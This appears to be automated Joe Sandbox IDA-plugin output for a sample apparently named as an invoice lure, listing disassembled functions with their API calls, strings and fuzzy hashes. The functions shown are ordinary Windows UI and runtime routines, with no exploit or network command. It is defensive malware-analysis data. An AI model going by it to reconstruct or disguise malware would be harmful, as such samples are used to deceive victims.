Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Select$CreateObject$ClipRect$BitmapBrushClientDeleteH_prolog3_IndirectMessagePatternReleaseSend
String ID:
API String ID: 810501027-0
Opcode ID: ee3785431912432bcc7fa21791211119782deb0e30f686da48ce024033a90d8f
Instruction ID: da30f6e68f1c10f6051ad8205d51c98e48cf12fa4a34028acade832c28efe19f
Opcode Fuzzy Hash: ee3785431912432bcc7fa21791211119782deb0e30f686da48ce024033a90d8f
Instruction Fuzzy Hash: A02126B2900209EFCF04EFA4C8998EEBBB9FF48300B044259E915B7261CB759905DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00D9C053, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00D9BD3E: _free.LIBCMT ref: 00D9BD63

_free.LIBCMT ref: 00D9C0A1

Part of subcall function 00D8DC18: HeapFree.KERNEL32(00000000,00000000,?,00D8AC8D), ref: 00D8DC2E
Part of subcall function 00D8DC18: GetLastError.KERNEL32(?,?,00D8AC8D), ref: 00D8DC40

_free.LIBCMT ref: 00D9C0AC
_free.LIBCMT ref: 00D9C0B7
_free.LIBCMT ref: 00D9C10B
_free.LIBCMT ref: 00D9C116
_free.LIBCMT ref: 00D9C121
_free.LIBCMT ref: 00D9C12C

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2c304bb37d07935307dfab7b8a52730038d4976c9967e2d7f0ef83b875c95e05
Instruction ID: 4df1b40e43faf46c367572956b795e8bfbb1fa658ce21a46df36ed3aeddab3cd
Opcode Fuzzy Hash: 2c304bb37d07935307dfab7b8a52730038d4976c9967e2d7f0ef83b875c95e05
Instruction Fuzzy Hash: 95112971540B18BADE20BBB1DE07FCB779DEF04724F410C16B29AA60D3DB65A54487B0

Uniqueness

Uniqueness Score: -1.00%

Function 00BC8F5A, Relevance: 10.6, APIs: 7, Instructions: 60COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00BC8F74
GetWindow.USER32(?,00000005), ref: 00BC8F7D
GetDlgCtrlID.USER32(00000000), ref: 00BC8F8C
GetWindowLongA.USER32 ref: 00BC8F9C
GetWindowRect.USER32 ref: 00BC8FBA
PtInRect.USER32(?,?,?), ref: 00BC8FCA
GetWindow.USER32(00000000,00000002), ref: 00BC8FD7

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 1c23525efbab427b9d81098229beb2426a2515b1cb6d7709a5a39aff099a6238
Instruction ID: 9e805f010694ce07a9b18e12134bf8a8ab6eea6317ee7d0e721c39c7066e840a
Opcode Fuzzy Hash: 1c23525efbab427b9d81098229beb2426a2515b1cb6d7709a5a39aff099a6238
Instruction Fuzzy Hash: B0115E3590162AEBCB119F659C08EEFBBF9EF49710F10466AF805E3250DB348A058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BB047C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BB0483

Part of subcall function 00BD583E: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00BD5865
Part of subcall function 00BD583E: _strlen.LIBCMT ref: 00BD5872

PathFindFileNameA.SHLWAPI(?,?,?,00000008), ref: 00BB04C6

Part of subcall function 00BA39F5: __EH_prolog3.LIBCMT ref: 00BA39FC
Part of subcall function 00BA39F5: _strlen.LIBCMT ref: 00BA3A37

PathRemoveExtensionA.SHLWAPI(?,00000000), ref: 00BB04F1
GlobalAddAtomA.KERNEL32 ref: 00BB0504
GlobalAddAtomA.KERNEL32 ref: 00BB0516

Strings

system, xrefs: 00BB050A

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: AtomFileGlobalH_prolog3NamePath_strlen$ExtensionFindModuleRemove
String ID: system
API String ID: 2967958677-3377271179
Opcode ID: 38624506d1244b027fd94add882e92ddd457b5540944e78ebe1d69003ed39725
Instruction ID: eed6911b8ce52d1223ab9ade0a8d19c2e0e8870d874731668d0cf3e1ac724d6c
Opcode Fuzzy Hash: 38624506d1244b027fd94add882e92ddd457b5540944e78ebe1d69003ed39725
Instruction Fuzzy Hash: E5115870910206DBCF14EFA0CD9A9FEB7B0FF15300F004998F02AA72A1DE715948DB66

Uniqueness

Uniqueness Score: -1.00%

Function 00BAEA53, Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 45COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BAEA5A

Part of subcall function 00BCE9A3: __EH_prolog3.LIBCMT ref: 00BCE9AA
Part of subcall function 00BCE9A3: _strlen.LIBCMT ref: 00BCEA62

Strings

Settings, xrefs: 00BAEAC5
Recent File List, xrefs: 00BAEA8F
, xrefs: 00BAEA67
File%d, xrefs: 00BAEA8A
PreviewPages, xrefs: 00BAEAC0

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: H_prolog3$_strlen
String ID: $File%d$PreviewPages$Recent File List$Settings
API String ID: 3239654323-2750173842
Opcode ID: 8e561af3549901add4aeca79d6734d0f412d5ac250f564718805795ae3cee53c
Instruction ID: edb8b43ebcc14e9751767bf234cbaf6f990b8b5e3ee680493ce10f3b420152a9
Opcode Fuzzy Hash: 8e561af3549901add4aeca79d6734d0f412d5ac250f564718805795ae3cee53c
Instruction Fuzzy Hash: 4701CC30B44301EFEF04AF64C846B6C7AE1AB49721F1481A9AD149B3D2CAF08904CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00BD0045, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00BAF283,?,?,?,?), ref: 00BD0057
GetProcAddress.KERNEL32(00000000,RegisterApplicationRecoveryCallback), ref: 00BD0067
EncodePointer.KERNEL32(00000000,?,?,00BAF283,?,?,?,?), ref: 00BD0070
DecodePointer.KERNEL32(00000000,?,?,00BAF283,?,?,?,?), ref: 00BD007E

Strings

RegisterApplicationRecoveryCallback, xrefs: 00BD0061
kernel32.dll, xrefs: 00BD0052

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: RegisterApplicationRecoveryCallback$kernel32.dll
API String ID: 2061474489-202725706
Opcode ID: 66bf6684d187cc44af206c5d3038c789f4a896e7194d4e695050da901349bd65
Instruction ID: 236b545004b45b52c8f874f5ede47e39dab9f864b7a54e259a60ce94743869c7
Opcode Fuzzy Hash: 66bf6684d187cc44af206c5d3038c789f4a896e7194d4e695050da901349bd65
Instruction Fuzzy Hash: 25F09035510319FF8B212F65EC08FAA7BE8AB08745B044166FD06E3320EA30CC01EBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00BD01D3, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(comctl32.dll), ref: 00BD01E5
GetProcAddress.KERNEL32(00000000,TaskDialogIndirect), ref: 00BD01F5
EncodePointer.KERNEL32(00000000), ref: 00BD01FE
DecodePointer.KERNEL32(00000000), ref: 00BD020C

Strings

TaskDialogIndirect, xrefs: 00BD01EF
comctl32.dll, xrefs: 00BD01E0

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: TaskDialogIndirect$comctl32.dll
API String ID: 2061474489-2809879075
Opcode ID: a9327f33631d526b46fcd72d142f346f5204b765c0395e27bc89ba4a3bab9870
Instruction ID: ecce06eb1e2b97f011f492f9618a478ec978c9653a5f5af75cf5023ae2c515ac
Opcode Fuzzy Hash: a9327f33631d526b46fcd72d142f346f5204b765c0395e27bc89ba4a3bab9870
Instruction Fuzzy Hash: CEF03635511326EF9B112FA49C4CEAEBBE4AB04745B040156FD05D3320EB30DC11DBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00BD0109, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(shell32.dll,?,?,00BCEE6E,00000000,00000000,00DFCDD0,00000000), ref: 00BD011B
GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00BD012B
EncodePointer.KERNEL32(00000000,?,00BCEE6E,00000000,00000000,00DFCDD0,00000000), ref: 00BD0134
DecodePointer.KERNEL32(00000000,?,?,00BCEE6E,00000000,00000000,00DFCDD0,00000000), ref: 00BD0142

Strings

SHCreateItemFromParsingName, xrefs: 00BD0125
shell32.dll, xrefs: 00BD0116

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: SHCreateItemFromParsingName$shell32.dll
API String ID: 2061474489-2320870614
Opcode ID: 45e637f1f39494b653e47501b9513c79499c6cf548793843ce3a64a5bee775a5
Instruction ID: ab9a4fc7d4a31bb69834d54db59de10ca76febf756da4a1c144db6e2d3376f39
Opcode Fuzzy Hash: 45e637f1f39494b653e47501b9513c79499c6cf548793843ce3a64a5bee775a5
Instruction Fuzzy Hash: FBF01D35511316EF9B212F65DC48AAA7BE8AB08752B044156FD06E3320EA30C8129BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BD016E, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(shell32.dll), ref: 00BD0180
GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00BD0190
EncodePointer.KERNEL32(00000000), ref: 00BD0199
DecodePointer.KERNEL32(00000000), ref: 00BD01A7

Strings

SHGetKnownFolderPath, xrefs: 00BD018A
shell32.dll, xrefs: 00BD017B

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: SHGetKnownFolderPath$shell32.dll
API String ID: 2061474489-2936008475
Opcode ID: f83b1b66e68db8d5633a9527d5d98a2df15f34c381bdc6b38416da7571a48cbf
Instruction ID: 663a0eb5458ad14751257ec7f3c5e51df4b425b0393752b8668b583e499d12cf
Opcode Fuzzy Hash: f83b1b66e68db8d5633a9527d5d98a2df15f34c381bdc6b38416da7571a48cbf
Instruction Fuzzy Hash: A0F01D35551316EF9B116F65DC48EAEBBE8AB08741B040556FD06E3360EB31C8129BB4

Uniqueness

Uniqueness Score: -1.00%

Function 00BD00AA, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00BAF267,?,?), ref: 00BD00BC
GetProcAddress.KERNEL32(00000000,RegisterApplicationRestart), ref: 00BD00CC
EncodePointer.KERNEL32(00000000,?,?,00BAF267,?,?), ref: 00BD00D5
DecodePointer.KERNEL32(00000000,?,?,00BAF267,?,?), ref: 00BD00E3

Strings

RegisterApplicationRestart, xrefs: 00BD00C6
kernel32.dll, xrefs: 00BD00B7

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: RegisterApplicationRestart$kernel32.dll
API String ID: 2061474489-1259503209
Opcode ID: c06345803013dbc93edee09618a8aa5741a948f25216bae29628cf2dd6898414
Instruction ID: 1211da4d5e1edac0f3566ab5271cff71a5c185bb37b8d0f8d1b7e9600491ace5
Opcode Fuzzy Hash: c06345803013dbc93edee09618a8aa5741a948f25216bae29628cf2dd6898414
Instruction Fuzzy Hash: 33F08235611315EF8B202B74AC49A9EBBE8EF04741B044166FD06F3324EA74DC41DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00BC4D13, Relevance: 10.5, APIs: 7, Instructions: 25COMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000F), ref: 00BC4D18
GetSysColor.USER32(00000010), ref: 00BC4D23
GetSysColor.USER32(00000014), ref: 00BC4D2E
GetSysColor.USER32(00000012), ref: 00BC4D39
GetSysColor.USER32(00000006), ref: 00BC4D44
GetSysColorBrush.USER32(0000000F), ref: 00BC4D4F
GetSysColorBrush.USER32(00000006), ref: 00BC4D5A

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 626c842dae76bf9188e41ae6d3429465f0358f30e1d4d3015bb2c14ce9258962
Instruction ID: b3be9ef5520dd60609c4b0f8a24f04b7ef60a3d3eacd8b44a4a8bf044754fea7
Opcode Fuzzy Hash: 626c842dae76bf9188e41ae6d3429465f0358f30e1d4d3015bb2c14ce9258962
Instruction Fuzzy Hash: 1FF06779D40B00DBD7206FB1AD4D7A67FE0BB48B11F041E1DE247CBA90D67590509B10

Uniqueness

Uniqueness Score: -1.00%

Function 00BEB1AF, Relevance: 9.4, APIs: 6, Instructions: 440COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BEB1B6

Part of subcall function 00BB95C9: GetWindowTextLengthA.USER32(?), ref: 00BB95DB
Part of subcall function 00BB95C9: GetWindowTextA.USER32 ref: 00BB95F4

InflateRect.USER32(?,?,?), ref: 00BEB30D
SetRectEmpty.USER32 ref: 00BEB319
InflateRect.USER32(?,00000000,00000000), ref: 00BEB3C7
OffsetRect.USER32(?,00000001,00000001), ref: 00BEB489
IsRectEmpty.USER32(?), ref: 00BEB53F

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Rect$EmptyInflateTextWindow$H_prolog3_LengthOffset
String ID:
API String ID: 2648887860-0
Opcode ID: 43710114c9085cd71170d21a5e43443d318c42437bdfd39d08e020b6600e6b74
Instruction ID: 227dc2e3bd4aeddc5c05ef08dde856a1832ef6ed8619fd05b97344c3a5695ead
Opcode Fuzzy Hash: 43710114c9085cd71170d21a5e43443d318c42437bdfd39d08e020b6600e6b74
Instruction Fuzzy Hash: 39F14A71A00259CFDF14CFA9C894AEE7BF5FF48310F1841A9E806AB295DB34AD45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BF0508, Relevance: 9.2, APIs: 6, Instructions: 174COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00BF051B
__EH_prolog3_GS.LIBCMT ref: 00BF053E

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: H_prolog3__strlen
String ID:
API String ID: 807648885-0
Opcode ID: db0f6782da557b86a5d373465d932eb4f4658d439e833885c9c06fe131c3c405
Instruction ID: 39858092e09ae582f99d54706f7dbf037f342bb7ba1cc52504a8d9ad7037af75
Opcode Fuzzy Hash: db0f6782da557b86a5d373465d932eb4f4658d439e833885c9c06fe131c3c405
Instruction Fuzzy Hash: 73513871910219EBDF10EFA8C995AEEBBF9EF44300F044159F905AB262CBB4A905CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BCEDCE, Relevance: 9.2, APIs: 6, Instructions: 168windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BCEDD5
_strlen.LIBCMT ref: 00BCEE34
_strlen.LIBCMT ref: 00BCEEF3
_strlen.LIBCMT ref: 00BCEF5A
SHAddToRecentDocs.SHELL32(00000002,?,?,00000000,?,?,?,?,?), ref: 00BCEF72
DeleteMenu.USER32(?,?,?,?,00000003,000000FF,00000000,?,?,?), ref: 00BCEFA1

Part of subcall function 00BA41E5: MultiByteToWideChar.KERNEL32(?,00000000,00000000,000000FF,?,?), ref: 00BA4208

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: _strlen$ByteCharDeleteDocsH_prolog3_MenuMultiRecentWide
String ID:
API String ID: 1073038054-0
Opcode ID: 74a209715d745b4ab1f9344dd02c78695bedb52132925527afc68f60724d6931
Instruction ID: 02a9973f29f5f3fe349549633aacb92d53d0e23b7dc7786ddfe6e3757e5e8767
Opcode Fuzzy Hash: 74a209715d745b4ab1f9344dd02c78695bedb52132925527afc68f60724d6931
Instruction Fuzzy Hash: AB51A235600219EBDB10AB64CC86FAEBBE9EF45350F144099F855AB291DB30EE44CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00BE8A5B, Relevance: 9.2, APIs: 6, Instructions: 158keyboardwindowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00000362,-0000E001,00000000), ref: 00BE8AD9
UpdateWindow.USER32(?), ref: 00BE8AFA
GetKeyState.USER32(00000079), ref: 00BE8B18
GetKeyState.USER32(00000012), ref: 00BE8B29
GetParent.USER32(?), ref: 00BE8BEC
PostMessageA.USER32(?,0000036A,00000000,00000000), ref: 00BE8C06

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: MessageState$ParentPostSendUpdateWindow
String ID:
API String ID: 3941036086-0
Opcode ID: 154a96bc12834780b5073c08dc35b5223fefa3c6161f09f9c346ab7f6efbabe7
Instruction ID: 6cd807f3e0de5e5836673f84c8dca9edf73704c5c6a8246e6de92ffeb57aeb10
Opcode Fuzzy Hash: 154a96bc12834780b5073c08dc35b5223fefa3c6161f09f9c346ab7f6efbabe7
Instruction Fuzzy Hash: 0151B071700A46EFEB149F25C888BBABBA5FF41310F0441B9E90A97291CF759C51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BF876C, Relevance: 9.1, APIs: 6, Instructions: 149windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 00BF87CB
SendMessageA.USER32(?,00001204,00000000,00000001), ref: 00BF8812
SendMessageA.USER32(?,00001204,00000001,00000001), ref: 00BF8846
SendMessageA.USER32(?,00000201,00000000,00000000), ref: 00BF88D0
SendMessageA.USER32(?,00000202,00000000,00000000), ref: 00BF88EC
PtInRect.USER32(?,?,?), ref: 00BF890C

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
